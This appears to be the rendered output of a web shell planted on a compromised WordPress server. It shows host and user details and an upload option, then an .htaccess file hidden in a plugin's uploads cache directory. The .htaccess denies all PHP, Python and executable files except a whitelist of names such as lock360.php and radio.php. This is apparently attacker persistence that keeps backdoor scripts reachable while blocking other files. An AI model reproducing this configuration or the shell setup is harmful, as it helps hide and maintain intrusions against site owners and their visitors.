HEX
Server: Apache/2.4.65 (Unix) OpenSSL/1.1.1k
System: Linux f37.eelserver.com 4.18.0-553.107.1.el8_10.x86_64 #1 SMP Mon Feb 23 10:50:53 EST 2026 x86_64
User: zulfiqar (1084)
PHP: 8.3.0
Disabled: NONE
Upload Files
File: /home/zulfiqar/public_html/wp-content/uploads/grid-gallery/cache/twig/fe/.htaccess
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>